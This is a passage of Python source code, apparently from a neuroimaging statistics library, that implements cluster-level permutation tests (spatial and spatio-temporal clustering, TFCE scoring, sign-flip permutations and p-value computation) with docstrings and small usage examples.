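    return _get_clusters_spatial(s, neighbors)  # -> [array([0, 1]), array([3])]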
def _reassign(check, clusters, base, num):
"""Helper function to reassign cluster numbers"""
# reconfigure check matrix
check[check == num] = base
# concatenate new values into clusters array
clusters[base - 1] = np.concatenate((clusters[base - 1],
clusters[num - 1]))
clusters[num - 1] = np.array([], dtype=int)
def _get_clusters_st_1step(keepers, neighbors):
"""Directly calculate connectivity based on knowledge that time points are
only connected to adjacent neighbors for data organized as time x space.
This algorithm's run time increases linearly with the number of time points,
compared to quadratically for the standard (graph) algorithm.
This algorithm creates clusters for each time point using a method more
efficient than the standard graph method (but otherwise equivalent), then
combines these clusters across time points in a reasonable way."""
n_src = len(neighbors)
n_times = len(keepers)
# start cluster numbering at 1 for diffing convenience
enum_offset = 1
check = np.zeros((n_times, n_src), dtype=int)
clusters = list()
for ii, k in enumerate(keepers):
c = _get_clusters_spatial(k, neighbors)
for ci, cl in enumerate(c):
check[ii, cl] = ci + enum_offset
enum_offset += len(c)
# give them the correct offsets
c = [cl + ii * n_src for cl in c]
clusters += c
# now that each cluster has been assigned a unique number, combine them
# by going through each time point
for check1, check2, k in zip(check[:-1], check[1:], keepers[:-1]):
# go through each one that needs reassignment
inds = k[check2[k] - check1[k] > 0]
check1_d = check1[inds]
n = check2[inds]
nexts = np.unique(n)
for num in nexts:
prevs = check1_d[n == num]
base = np.min(prevs)
for pr in np.unique(prevs[prevs != base]):
_reassign(check1, clusters, base, pr)
# reassign values
_reassign(check2, clusters, base, num)
# clean up clusters
clusters = [cl for cl in clusters if len(cl) > 0]
return clusters
def _get_clusters_st_multistep(keepers, neighbors, max_step=1):
"""Directly calculate connectivity based on knowledge that time points are
only connected to adjacent neighbors for data organized as time x space.
This algorithm's run time increases linearly with the number of time points,
compared to quadratically for the standard (graph) algorithm."""
n_src = len(neighbors)
n_times = len(keepers)
t_border = list()
t_border.append(0)
for ki, k in enumerate(keepers):
keepers[ki] = k + ki * n_src
t_border.append(t_border[ki] + len(k))
t_border = np.array(t_border)
keepers = np.concatenate(keepers)
v = keepers
t, s = divmod(v, n_src)
r = np.ones(t.shape, dtype=bool)
clusters = list()
next_ind = 0
inds = np.arange(t_border[0], t_border[n_times])
if s.size > 0:
while next_ind is not None:
# put first point in a cluster, adjust remaining
t_inds = [next_ind]
r[next_ind] = False
icount = 1 # count of nodes in the current cluster
# look for significant values at the next time point,
# same sensor, not placed yet, and add those
while icount <= len(t_inds):
ind = t_inds[icount - 1]
selves = inds[t_border[max(t[ind] - max_step, 0)]:
t_border[min(t[ind] + max_step + 1, n_times)]]
selves = selves[r[selves]]
selves = selves[s[ind] == s[selves]]
# look at current time point across other vertices
buddies = inds[t_border[t[ind]]:t_border[t[ind] + 1]]
buddies = buddies[r[buddies]]
buddies = buddies[in1d(s[buddies], neighbors[s[ind]],
assume_unique=True)]
buddies = np.concatenate((selves, buddies))
t_inds += buddies.tolist()
r[buddies] = False
icount += 1
# this is equivalent to np.where(r)[0] for these purposes, but it's
# a little bit faster. Unfortunately there's no way to tell numpy
# just to find the first instance (to save checking every one):
next_ind = np.argmax(r)
if next_ind == 0:
next_ind = None
clusters.append(v[t_inds])
return clusters
def _get_clusters_st(x_in, neighbors, max_step=1):
"""Helper function to choose the most efficient version"""
n_src = len(neighbors)
n_times = x_in.size // n_src
cl_goods = np.where(x_in)[0]
if len(cl_goods) > 0:
keepers = [np.array([], dtype=int)] * n_times
row, col = unravel_index(cl_goods, (n_times, n_src))
if isinstance(row, int):
row = [row]
col = [col]
lims = [0]
else:
order = np.argsort(row)
row = row[order]
col = col[order]
lims = [0] + (np.where(np.diff(row) > 0)[0]
+ 1).tolist() + [len(row)]
for start, end in zip(lims[:-1], lims[1:]):
keepers[row[start]] = np.sort(col[start:end])
if max_step == 1:
return _get_clusters_st_1step(keepers, neighbors)
else:
return _get_clusters_st_multistep(keepers, neighbors,
max_step)
else:
return []
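# Minimal sketch (hypothetical data): two spatial vertices that neighbor
# each other, two time points, raveled as (t0,v0), (t0,v1), (t1,v0),
# (t1,v1). Vertex 0 is significant at both time points and with max_step=1
# the two samples merge into a single spatio-temporal cluster.
def _example_get_clusters_st():
    neighbors = [np.array([1]), np.array([0])]
    x_in = np.array([True, False, True, False])
    return _get_clusters_st(x_in, neighbors, max_step=1)  # -> [array([0, 2])]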
def _get_components(x_in, connectivity, return_list=True):
"""get connected components from a mask and a connectivity matrix"""
try:
from sklearn.utils._csgraph import cs_graph_components
except ImportError:
try:
from scikits.learn.utils._csgraph import cs_graph_components
except ImportError:
try:
from sklearn.utils.sparsetools import connected_components
cs_graph_components = connected_components
except ImportError:
# in theory we might be able to shoehorn this into using
# _get_clusters_spatial if we transform connectivity into
# a neighbor list, and it might end up being faster anyway,
# but for now:
raise ImportError('scikit-learn must be installed')
mask = np.logical_and(x_in[connectivity.row], x_in[connectivity.col])
data = connectivity.data[mask]
row = connectivity.row[mask]
col = connectivity.col[mask]
shape = connectivity.shape
idx = np.where(x_in)[0]
row = np.concatenate((row, idx))
col = np.concatenate((col, idx))
data = np.concatenate((data, np.ones(len(idx), dtype=data.dtype)))
connectivity = sparse.coo_matrix((data, (row, col)), shape=shape)
_, components = cs_graph_components(connectivity)
if return_list:
labels = np.unique(components)
clusters = list()
for l in labels:
c = np.where(components == l)[0]
if np.any(x_in[c]):
clusters.append(c)
# logger.info("-- number of components : %d"
# % np.unique(components).size)
return clusters
else:
return components
def _find_clusters(x, threshold, tail=0, connectivity=None, max_step=1,
include=None, partitions=None, t_power=1, show_info=False):
"""For a given 1d-array (test statistic), find all clusters which
are above/below a certain threshold. Returns a list of 2-tuples.
When doing a two-tailed test (tail == 0), only points with the same
sign will be clustered together.
Parameters
----------
x : 1D array
Data
threshold : float | dict
Where to threshold the statistic. Should be negative for tail == -1,
and positive for tail == 0 or 1. Can also be an dict for
threshold-free cluster enhancement.
tail : -1 | 0 | 1
Type of comparison
connectivity : sparse matrix in COO format, None, or list
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
If connectivity is a list, it is assumed that each entry stores the
indices of the spatial neighbors in a spatio-temporal dataset x.
Default is None, i.e, a regular lattice connectivity.
max_step : int
If connectivity is a list, this defines the maximal number of steps
between vertices along the second dimension (typically time) to be
considered connected.
include : 1D bool array or None
Mask to apply to the data of points to cluster. If None, all points
are used.
partitions : array of int or None
An array (same size as X) of integers indicating which points belong
to each partition.
t_power : float
Power to raise the statistical values (usually t-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
show_info : bool
If True, display information about thresholds used (for TFCE). Should
only be done for the standard permutation.
Returns
-------
clusters : list of slices or list of arrays (boolean masks)
We use slices for 1D signals and mask to multidimensional
arrays.
sums: array
Sum of x values in clusters.
"""
if tail not in [-1, 0, 1]:
raise ValueError('invalid tail parameter')
x = np.asanyarray(x)
if not np.isscalar(threshold):
if not isinstance(threshold, dict):
raise TypeError('threshold must be a number, or a dict for '
'threshold-free cluster enhancement')
if not all([key in threshold for key in ['start', 'step']]):
raise KeyError('threshold, if dict, must have at least '
'"start" and "step"')
tfce = True
if tail == -1:
if threshold['start'] > 0:
raise ValueError('threshold["start"] must be <= 0 for '
'tail == -1')
if threshold['step'] >= 0:
raise ValueError('threshold["step"] must be < 0 for '
'tail == -1')
stop = np.min(x)
elif tail == 1:
stop = np.max(x)
else: # tail == 0
stop = np.max(np.abs(x))
thresholds = np.arange(threshold['start'], stop,
threshold['step'], float)
h_power = threshold.get('h_power', 2)
e_power = threshold.get('e_power', 0.5)
if show_info is True:
if len(thresholds) == 0:
txt = ('threshold["start"] (%s) is more extreme than '
'data statistics with most extreme value %s'
% (threshold['start'], stop))
logger.warning(txt)
warnings.warn(txt)
else:
logger.info('Using %d thresholds from %0.2f to %0.2f for TFCE '
'computation (h_power=%0.2f, e_power=%0.2f)'
% (len(thresholds), thresholds[0], thresholds[-1],
h_power, e_power))
scores = np.zeros(x.size)
else:
thresholds = [threshold]
tfce = False
# include all points by default
if include is None:
include = np.ones(x.shape, dtype=bool)
if not np.all(np.diff(thresholds) > 0):
raise RuntimeError('Threshold misconfiguration, must be monotonically'
' increasing')
# set these here just in case thresholds == []
clusters = list()
sums = np.empty(0)
for ti, thresh in enumerate(thresholds):
# these need to be reset on each run
clusters = list()
sums = np.empty(0)
if tail == 0:
x_ins = [np.logical_and(x > thresh, include),
np.logical_and(x < -thresh, include)]
elif tail == -1:
x_ins = [np.logical_and(x < thresh, include)]
else: # tail == 1
x_ins = [np.logical_and(x > thresh, include)]
# loop over tails
for x_in in x_ins:
if np.any(x_in):
out = _find_clusters_1dir_parts(x, x_in, connectivity,
max_step, partitions, t_power)
clusters += out[0]
sums = np.concatenate((sums, out[1]))
if tfce is True:
# TFCE: each point's score accumulates h**h_power * e**e_power over all
# supporting thresholds, where e is the extent of the cluster containing
# the point at height h.
if ti == 0:
h = abs(thresh)
else:
h = abs(thresh - thresholds[ti - 1])
h = h ** h_power
for c in clusters:
# triage based on cluster storage type
if isinstance(c, slice):
len_c = c.stop - c.start
elif isinstance(c, tuple):
len_c = len(c)
elif c.dtype == bool:
len_c = np.sum(c)
else:
len_c = len(c)
scores[c] += h * (len_c ** e_power)
if tfce is True:
# each point gets treated independently
clusters = np.arange(x.size)
if connectivity is None:
if x.ndim == 1:
# slices
clusters = [slice(c, c + 1) for c in clusters]
else:
# boolean masks (raveled)
clusters = [(clusters == ii).ravel()
for ii in range(len(clusters))]
else:
clusters = [np.array([c]) for c in clusters]
sums = scores
return clusters, sums
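# Minimal usage sketch (hypothetical values): threshold a 1D statistic map
# at 2.0 with a two-tailed test. Without a connectivity matrix, 1D inputs
# are clustered with scipy.ndimage and points are grouped by sign, so this
# yields one positive cluster over indices 1-2 (sum 5.5) and one negative
# cluster at index 4 (sum -4.0).
def _example_find_clusters():
    x = np.array([0.1, 2.5, 3.0, 0.2, -4.0])
    clusters, sums = _find_clusters(x, threshold=2.0, tail=0)
    return clusters, sums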
def _find_clusters_1dir_parts(x, x_in, connectivity, max_step, partitions,
t_power):
"""Deal with partitions, and pass the work to _find_clusters_1dir
"""
if partitions is None:
clusters, sums = _find_clusters_1dir(x, x_in, connectivity, max_step,
t_power)
else:
# cluster each partition separately
clusters = list()
sums = list()
for p in range(np.max(partitions) + 1):
x_i = np.logical_and(x_in, partitions == p)
out = _find_clusters_1dir(x, x_i, connectivity, max_step, t_power)
clusters += out[0]
sums.append(out[1])
sums = np.concatenate(sums)
return clusters, sums
def _find_clusters_1dir(x, x_in, connectivity, max_step, t_power):
"""Actually call the clustering algorithm"""
if connectivity is None:
labels, n_labels = ndimage.label(x_in)
if x.ndim == 1:
# slices
clusters = ndimage.find_objects(labels, n_labels)
if len(clusters) == 0:
sums = list()
else:
index = list(range(1, n_labels + 1))
if t_power == 1:
sums = ndimage.measurements.sum(x, labels, index=index)
else:
sums = ndimage.measurements.sum(np.sign(x) *
np.abs(x) ** t_power,
labels, index=index)
else:
# boolean masks (raveled)
clusters = list()
sums = np.empty(n_labels)
for l in range(1, n_labels + 1):
c = labels == l
clusters.append(c.ravel())
if t_power == 1:
sums[l - 1] = np.sum(x[c])
else:
sums[l - 1] = np.sum(np.sign(x[c]) *
np.abs(x[c]) ** t_power)
else:
if x.ndim > 1:
raise Exception("Data should be 1D when using a connectivity "
"to define clusters.")
if isinstance(connectivity, sparse.spmatrix):
clusters = _get_components(x_in, connectivity)
elif isinstance(connectivity, list): # use temporal adjacency
clusters = _get_clusters_st(x_in, connectivity, max_step)
else:
raise ValueError('Connectivity must be a sparse matrix or list')
if t_power == 1:
sums = np.array([np.sum(x[c]) for c in clusters])
else:
sums = np.array([np.sum(np.sign(x[c]) * np.abs(x[c]) ** t_power)
for c in clusters])
return clusters, np.atleast_1d(sums)
def _cluster_indices_to_mask(components, n_tot):
"""Convert to the old format of clusters, which were bool arrays"""
for ci, c in enumerate(components):
components[ci] = np.zeros((n_tot), dtype=bool)
components[ci][c] = True
return components
def _cluster_mask_to_indices(components):
"""Convert to the old format of clusters, which were bool arrays"""
for ci, c in enumerate(components):
if not isinstance(c, slice):
components[ci] = np.where(c)[0]
return components
def _pval_from_histogram(T, H0, tail):
"""Get p-values from stats values given an H0 distribution
For each stat compute a p-value as percentile of its statistics
within all statistics in surrogate data
"""
if tail not in [-1, 0, 1]:
raise ValueError('invalid tail parameter')
# from pct to fraction
if tail == -1: # lower tail
pval = np.array([np.sum(H0 <= t) for t in T])
elif tail == 1: # upper tail
pval = np.array([np.sum(H0 >= t) for t in T])
else: # both tails
pval = np.array([np.sum(abs(H0) >= abs(t)) for t in T])
pval = (pval + 1.0) / (H0.size + 1.0) # the init data is one resampling
return pval
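# Minimal sketch (hypothetical values): with a null distribution of 4
# permutation maxima, an observed statistic of 3.0 exceeded by none of them
# gets p = (0 + 1) / (4 + 1) = 0.2 under the upper-tail test (tail=1 counts
# null values >= the observed one).
def _example_pval_from_histogram():
    T = np.array([3.0])
    H0 = np.array([0.5, 1.0, 1.5, 2.0])
    return _pval_from_histogram(T, H0, tail=1)  # -> array([0.2])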
def _setup_connectivity(connectivity, n_vertices, n_times):
if connectivity.shape[0] == n_vertices: # use global algorithm
connectivity = connectivity.tocoo()
n_times = None
else: # use temporal adjacency algorithm
if not round(n_vertices / float(connectivity.shape[0])) == n_times:
raise ValueError('connectivity must be of the correct size')
# we claim to only use upper triangular part... not true here
connectivity = (connectivity + connectivity.transpose()).tocsr()
connectivity = [connectivity.indices[connectivity.indptr[i]:
connectivity.indptr[i + 1]] for i in
range(len(connectivity.indptr) - 1)]
return connectivity
def _do_permutations(X_full, slices, threshold, tail, connectivity, stat_fun,
max_step, include, partitions, t_power, seeds,
sample_shape, buffer_size, progress_bar):
n_samp, n_vars = X_full.shape
if buffer_size is not None and n_vars <= buffer_size:
buffer_size = None # don't use buffer for few variables
# allocate space for output
max_cluster_sums = np.empty(len(seeds), dtype=np.double)
if buffer_size is not None:
# allocate buffer, so we don't need to allocate memory during loop
X_buffer = [np.empty((len(X_full[s]), buffer_size), dtype=X_full.dtype)
for s in slices]
for seed_idx, seed in enumerate(seeds):
if progress_bar is not None:
if (not (seed_idx + 1) % 32) or (seed_idx == 0):
progress_bar.update(seed_idx + 1)
# shuffle sample indices
rng = np.random.RandomState(seed)
idx_shuffled = np.arange(n_samp)
rng.shuffle(idx_shuffled)
idx_shuffle_list = [idx_shuffled[s] for s in slices]
if buffer_size is None:
# shuffle all data at once
X_shuffle_list = [X_full[idx, :] for idx in idx_shuffle_list]
T_obs_surr = stat_fun(*X_shuffle_list)
else:
# only shuffle a small data buffer, so we need less memory
T_obs_surr = np.empty(n_vars, dtype=X_full.dtype)
for pos in range(0, n_vars, buffer_size):
# number of variables for this loop
n_var_loop = min(pos + buffer_size, n_vars) - pos
# fill buffer
for i, idx in enumerate(idx_shuffle_list):
X_buffer[i][:, :n_var_loop] =\
X_full[idx, pos: pos + n_var_loop]
# apply stat_fun and store result
tmp = stat_fun(*X_buffer)
T_obs_surr[pos: pos + n_var_loop] = tmp[:n_var_loop]
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs_surr.shape = sample_shape
# Find cluster on randomized stats
out = _find_clusters(T_obs_surr, threshold=threshold, tail=tail,
max_step=max_step, connectivity=connectivity,
partitions=partitions, include=include,
t_power=t_power)
perm_clusters_sums = out[1]
if len(perm_clusters_sums) > 0:
max_cluster_sums[seed_idx] = np.max(perm_clusters_sums)
else:
max_cluster_sums[seed_idx] = 0
return max_cluster_sums
def _do_1samp_permutations(X, slices, threshold, tail, connectivity, stat_fun,
max_step, include, partitions, t_power, seeds,
sample_shape, buffer_size, progress_bar):
n_samp, n_vars = X.shape
assert slices is None # should be None for the 1 sample case
if buffer_size is not None and n_vars <= buffer_size:
buffer_size = None # don't use buffer for few variables
# allocate space for output
max_cluster_sums = np.empty(len(seeds), dtype=np.double)
if buffer_size is not None:
# allocate a buffer so we don't need to allocate memory in loop
X_flip_buffer = np.empty((n_samp, buffer_size), dtype=X.dtype)
for seed_idx, seed in enumerate(seeds):
if progress_bar is not None:
if not (seed_idx + 1) % 32 or seed_idx == 0:
progress_bar.update(seed_idx + 1)
if isinstance(seed, np.ndarray):
# new surrogate data with specified sign flip
if not seed.size == n_samp:
                raise ValueError('seed array must be n_samples long')
signs = 2 * seed[:, None].astype(int) - 1
if not np.all(np.equal(np.abs(signs), 1)):
raise ValueError('signs from rng must be +/- 1')
else:
rng = np.random.RandomState(seed)
# new surrogate data with random sign flip
signs = np.sign(0.5 - rng.rand(n_samp))
signs = signs[:, np.newaxis]
if buffer_size is None:
X *= signs
# Recompute statistic on randomized data
T_obs_surr = stat_fun(X)
# Set X back to previous state (trade memory eff. for CPU use)
X *= signs
else:
# only sign-flip a small data buffer, so we need less memory
T_obs_surr = np.empty(n_vars, dtype=X.dtype)
for pos in range(0, n_vars, buffer_size):
# number of variables for this loop
n_var_loop = min(pos + buffer_size, n_vars) - pos
X_flip_buffer[:, :n_var_loop] =\
signs * X[:, pos: pos + n_var_loop]
# apply stat_fun and store result
tmp = stat_fun(X_flip_buffer)
T_obs_surr[pos: pos + n_var_loop] = tmp[:n_var_loop]
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs_surr.shape = sample_shape
# Find cluster on randomized stats
out = _find_clusters(T_obs_surr, threshold=threshold, tail=tail,
max_step=max_step, connectivity=connectivity,
partitions=partitions, include=include,
t_power=t_power)
perm_clusters_sums = out[1]
if len(perm_clusters_sums) > 0:
# get max with sign info
idx_max = np.argmax(np.abs(perm_clusters_sums))
max_cluster_sums[seed_idx] = perm_clusters_sums[idx_max]
else:
max_cluster_sums[seed_idx] = 0
return max_cluster_sums
@verbose
def _permutation_cluster_test(X, threshold, n_permutations, tail, stat_fun,
connectivity, verbose, n_jobs, seed, max_step,
exclude, step_down_p, t_power, out_type,
check_disjoint, buffer_size):
    """ Aux Function
    Note. X is required to be a list. Depending on the length of X
    either a 1 sample t-test or an F-test / more sample permutation scheme
    is elicited.
    """
    n_jobs = check_n_jobs(n_jobs)
if out_type not in ['mask', 'indices']:
raise ValueError('out_type must be either \'mask\' or \'indices\'')
# check dimensions for each group in X (a list at this stage).
X = [x[:, np.newaxis] if x.ndim == 1 else x for x in X]
n_samples = X[0].shape[0]
n_times = X[0].shape[1]
sample_shape = X[0].shape[1:]
for x in X:
if x.shape[1:] != sample_shape:
            raise ValueError('All samples must have the same size')
# flatten the last dimensions in case the data is high dimensional
X = [np.reshape(x, (x.shape[0], -1)) for x in X]
n_tests = X[0].shape[1]
if connectivity is not None:
connectivity = _setup_connectivity(connectivity, n_tests, n_times)
if (exclude is not None) and not exclude.size == n_tests:
raise ValueError('exclude must be the same shape as X[0]')
# Step 1: Calculate T-stat for original data
# -------------------------------------------------------------
T_obs = stat_fun(*X)
logger.info('stat_fun(H1): min=%f max=%f' % (np.min(T_obs), np.max(T_obs)))
# test if stat_fun treats variables independently
if buffer_size is not None:
T_obs_buffer = np.zeros_like(T_obs)
for pos in range(0, n_tests, buffer_size):
T_obs_buffer[pos: pos + buffer_size] =\
stat_fun(*[x[:, pos: pos + buffer_size] for x in X])
        if not np.all(T_obs == T_obs_buffer):
logger.warning('Provided stat_fun does not treat variables '
'independently. Setting buffer_size to None.')
buffer_size = None
# The stat should have the same shape as the samples for no conn.
if connectivity is None:
T_obs.shape = sample_shape
if exclude is not None:
include = np.logical_not(exclude)
else:
include = None
# determine if connectivity itself can be separated into disjoint sets
if check_disjoint is True and connectivity is not None:
partitions = _get_partitions_from_connectivity(connectivity, n_times)
else:
partitions = None
    logger.info('Running initial clustering')
out = _find_clusters(T_obs, threshold, tail, connectivity,
max_step=max_step, include=include,
partitions=partitions, t_power=t_power,
show_info=True)
clusters, cluster_stats = out
# For TFCE, return the "adjusted" statistic instead of raw scores
if isinstance(threshold, dict):
T_obs = cluster_stats.copy()
logger.info('Found %d clusters' % len(clusters))
# convert clusters to old format
if connectivity is not None:
# our algorithms output lists of indices by default
if out_type == 'mask':
clusters = _cluster_indices_to_mask(clusters, n_tests)
else:
# ndimage outputs slices or boolean masks by default
if out_type == 'indices':
clusters = _cluster_mask_to_indices(clusters)
# The stat should have the same shape as the samples
T_obs.shape = sample_shape
if len(X) == 1: # 1 sample test
do_perm_func = _do_1samp_permutations
X_full = X[0]
slices = None
else:
do_perm_func = _do_permutations
X_full = np.concatenate(X, axis=0)
n_samples_per_condition = [x.shape[0] for x in X]
splits_idx = np.append([0], np.cumsum(n_samples_per_condition))
slices = [slice(splits_idx[k], splits_idx[k + 1])
for k in range(len(X))]
parallel, my_do_perm_func, _ = parallel_func(do_perm_func, n_jobs)
# Step 2: If we have some clusters, repeat process on permuted data
# -------------------------------------------------------------------
def get_progress_bar(seeds):
        # make sure the progress bar adds up to 100% across n jobs
return (ProgressBar(len(seeds), spinner=True) if
logger.level <= logging.INFO else None)
if len(clusters) > 0:
# check to see if we can do an exact test
# note for a two-tailed test, we can exploit symmetry to just do half
seeds = None
if len(X) == 1:
max_perms = 2 ** (n_samples - (tail == 0))
if max_perms <= n_permutations:
# omit first perm b/c accounted for in _pval_from_histogram,
# convert to binary array representation
seeds = [np.fromiter(np.binary_repr(s, n_samples), dtype=int)
for s in range(1, max_perms)]
if seeds is None:
if seed is None:
seeds = [None] * n_permutations
else:
seeds = list(seed + np.arange(n_permutations))
# Step 3: repeat permutations for step-down-in-jumps procedure
n_removed = 1 # number of new clusters added
total_removed = 0
step_down_include = None # start out including all points
n_step_downs = 0
while n_removed > 0:
# actually do the clustering for each partition
if include is not None:
if step_down_include is not None:
this_include = np.logical_and(include, step_down_include)
else:
this_include = include
else:
this_include = step_down_include
logger.info('Permuting ...')
H0 = parallel(my_do_perm_func(X_full, slices, threshold, tail,
connectivity, stat_fun, max_step, this_include,
partitions, t_power, s, sample_shape, buffer_size,
get_progress_bar(s))
for s in split_list(seeds, n_jobs))
H0 = np.concatenate(H0)
logger.info('Computing cluster p-values')
cluster_pv = _pval_from_histogram(cluster_stats, H0, tail)
# figure out how many new ones will be removed for step-down
to_remove = np.where(cluster_pv < step_down_p)[0]
n_removed = to_remove.size - total_removed
total_removed = to_remove.size
step_down_include = np.ones(n_tests, dtype=bool)
for ti in to_remove:
step_down_include[clusters[ti]] = False
if connectivity is None:
step_down_include.shape = sample_shape
n_step_downs += 1
if step_down_p > 0:
a_text = 'additional ' if n_step_downs > 1 else ''
pl = '' if n_removed == 1 else 's'
logger.info('Step-down-in-jumps iteration #%i found %i %s'
'cluster%s to exclude from subsequent iterations'
% (n_step_downs, n_removed, a_text, pl))
logger.info('Done.')
# The clusters should have the same shape as the samples
clusters = _reshape_clusters(clusters, sample_shape)
return T_obs, clusters, cluster_pv, H0
else:
return T_obs, np.array([]), np.array([]), np.array([])
def ttest_1samp_no_p(X, sigma=0, method='relative'):
"""t-test with variance adjustment and no p-value calculation
Parameters
----------
X : array
Array to return t-values for.
sigma : float
        The variance estimate will be given by "var + sigma * max(var)" or
"var + sigma", depending on "method". By default this is 0 (no
adjustment). See Notes for details.
method : str
If 'relative', the minimum variance estimate will be sigma * max(var),
if 'absolute' the minimum variance estimate will be sigma.
Returns
-------
t : array
t-values, potentially adjusted using the hat method.
Notes
-----
One can use the conversion:
threshold = -scipy.stats.distributions.t.ppf(p_thresh, n_samples - 1)
to convert a desired p-value threshold to t-value threshold. Don't forget
that for two-tailed tests, p_thresh in the above should be divided by 2.
To use the "hat" adjustment method, a value of sigma=1e-3 may be a
reasonable choice. See Ridgway et al. 2012 "The problem of low variance
voxels in statistical parametric mapping; a new hat avoids a 'haircut'",
NeuroImage. 2012 Feb 1;59(3):2131-41.
"""
if method not in ['absolute', 'relative']:
raise ValueError('method must be "absolute" or "relative", not %s'
% method)
var = np.var(X, axis=0, ddof=1)
if sigma > 0:
limit = sigma * np.max(var) if method == 'relative' else sigma
var += limit
return np.mean(X, axis=0) / np.sqrt(var / X.shape[0])
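# Illustrative sketch (hypothetical data): plain vs. "hat"-adjusted t-values,
# plus the docstring's p-value to t-threshold conversion for a two-tailed test.
def _example_ttest_1samp_no_p():
    rng = np.random.RandomState(0)
    X = rng.randn(20, 10) + 0.5  # 20 observations, 10 variables
    t_plain = ttest_1samp_no_p(X)
    t_hat = ttest_1samp_no_p(X, sigma=1e-3)  # hat variance adjustment
    # two-tailed threshold at p < 0.05 (p divided by 2, as noted above)
    threshold = -stats.distributions.t.ppf(0.05 / 2., X.shape[0] - 1)
    return t_plain, t_hat, threshold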
@verbose
def permutation_cluster_test(X, threshold=None, n_permutations=1024,
tail=0, stat_fun=f_oneway,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, exclude=None,
step_down_p=0, t_power=1, out_type='mask',
check_disjoint=False, buffer_size=1000):
"""Cluster-level statistical permutation test
For a list of nd-arrays of data, e.g. 2d for time series or 3d for
time-frequency power values, calculate some statistics corrected for
multiple comparisons using permutations and cluster level correction.
Each element of the list X contains the data for one group of
observations. Randomized data are generated with random partitions
of the data.
Parameters
----------
X : list
List of nd-arrays containing the data. Each element of X contains
the samples for one group. First dimension of each element is the
number of samples/observations in this group. The other dimensions
are for the size of the observations. For example if X = [X1, X2]
with X1.shape = (20, 50, 4) and X2.shape = (17, 50, 4) one has
2 groups with respectively 20 and 17 observations in each.
Each data point is of shape (50, 4).
threshold : float | dict | None
        If threshold is None, it will choose an F-threshold equivalent to
        p < 0.05 based on the number of observations in each group.
If a dict is used, then threshold-free cluster enhancement (TFCE)
will be used.
n_permutations : int
The number of permutations to compute.
tail : -1 or 0 or 1 (default = 0)
If tail is 1, the statistic is thresholded above threshold.
If tail is -1, the statistic is thresholded below threshold.
If tail is 0, the statistic is thresholded on both sides of
the distribution.
stat_fun : callable
function called to calculate statistics, must accept 1d-arrays as
arguments (default: scipy.stats.f_oneway).
connectivity : sparse matrix.
Defines connectivity between features. The matrix is assumed to
be symmetric and only the upper triangular half is used.
Default is None, i.e, a regular lattice connectivity.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
seed : int or None
Seed the random number generator for results reproducibility.
max_step : int
When connectivity is a n_vertices x n_vertices matrix, specify the
maximum number of steps between vertices along the second dimension
(typically time) to be considered connected. This is not used for full
or None connectivity matrices.
exclude : boolean array or None
Mask to apply to the data to exclude certain points from clustering
(e.g., medial wall vertices). Should be the same shape as X. If None,
no points are excluded.
step_down_p : float
To perform a step-down-in-jumps test, pass a p-value for clusters to
exclude from each successive iteration. Default is zero, perform no
step-down test (since no clusters will be smaller than this value).
Setting this to a reasonable value, e.g. 0.05, can increase sensitivity
but costs computation time.
t_power : float
Power to raise the statistical values (usually f-values) by before
summing (sign will be retained). Note that t_power == 0 will give a
count of nodes in each cluster, t_power == 1 will weight each node by
its statistical score.
out_type : str
For arrays with connectivity, this sets the output format for clusters.
If 'mask', it will pass back a list of boolean mask arrays.
If 'indices', it will pass back a list of lists, where each list is the
set of vertices in a given cluster. Note that the latter may use far
less memory for large datasets.
    check_disjoint : bool
        If True, the connectivity matrix (or list) will be examined to
        determine if it can be separated into disjoint sets. In some cases
        (usually with connectivity as a list and many "time" points), this
        can lead to faster clustering, but results should be identical.
    buffer_size : int or None
        The statistics will be computed for blocks of variables of size
        "buffer_size" at a time. This option significantly reduces the
        memory requirements when n_jobs > 1 and memory sharing between
        processes is enabled (see set_cache_dir()), as X will be shared
        between processes and each process only needs to allocate space
        for a small block of variables.
Returns
-------
T_obs : array of shape [n_tests]
T-statistic observed for all variables.
clusters : list
List type defined by out_type above.
cluster_pv : array
P-value for each cluster
H0 : array of shape [n_permutations]
Max cluster level stats observed under permutation.
Notes
-----
Reference:
Cluster permutation algorithm as described in
Maris/Oostenveld (2007),
"Nonparametric statistical testing of EEG- and MEG-data"
Journal of Neuroscience Methods, Vol. 164, No. 1., pp. 177-190.
doi:10.1016/j.jneumeth.2007.03.024
"""
if threshold is None:
p_thresh = 0.05 / (1 + (tail == 0))
n_samples_per_group = [len(x) for x in X]
threshold = stats.distributions.f.ppf(1. - p_thresh,
*n_samples_per_group)
if np.sign(tail) < 0:
threshold = -threshold
return _permutation_cluster_test(X=X, threshold=threshold,
n_permutations=n_permutations,
tail=tail, stat_fun=stat_fun,
connectivity=connectivity,
verbose=verbose,
n_jobs=n_jobs, seed=seed,
max_step=max_step,
exclude=exclude, step_down_p=step_down_p,
t_power=t_power, out_type=out_type,
check_disjoint=check_disjoint,
buffer_size=buffer_size)
permutation_cluster_test.__test__ = False
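# Illustrative usage sketch (hypothetical data): comparing two groups of 1D
# signals with the default F-statistic; an effect is injected in samples 20-30.
def _example_permutation_cluster_test():
    rng = np.random.RandomState(42)
    X1 = rng.randn(20, 50)
    X2 = rng.randn(17, 50)
    X2[:, 20:30] += 1.  # group difference in samples 20-30
    T_obs, clusters, cluster_pv, H0 = permutation_cluster_test(
        [X1, X2], n_permutations=100, tail=0)
    return clusters, cluster_pv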
@verbose
def permutation_cluster_1samp_test(X, threshold=None, n_permutations=1024,
tail=0, stat_fun=ttest_1samp_no_p,
connectivity=None, verbose=None, n_jobs=1,
seed=None, max_step=1, exclude=None,
step_down_p=0, t_power=1, out_type='mask',
check_disjoint=False, buffer_size=1000):
"""Non-parametric cluster-level 1 sample T-test
    From an array of observations, e.g. signal amplitudes or power spectrum
estimates etc., calculate if the observed mean significantly deviates
from 0. The procedure uses a cluster analysis with permutation test
for calculating corrected p-values. Randomized data are generated with
random sign flips.
Parameters
----------
X : array, shape=(n_samples, p, q) or (n_samples, p)
Array where the first dimension corresponds to the
samples (observations). X[k] can be a 1D or 2D array (time series
or TF image) associated to the kth observation.
threshold : float | dict | None
If threshold is None, it will choose a t-threshold equivalent to
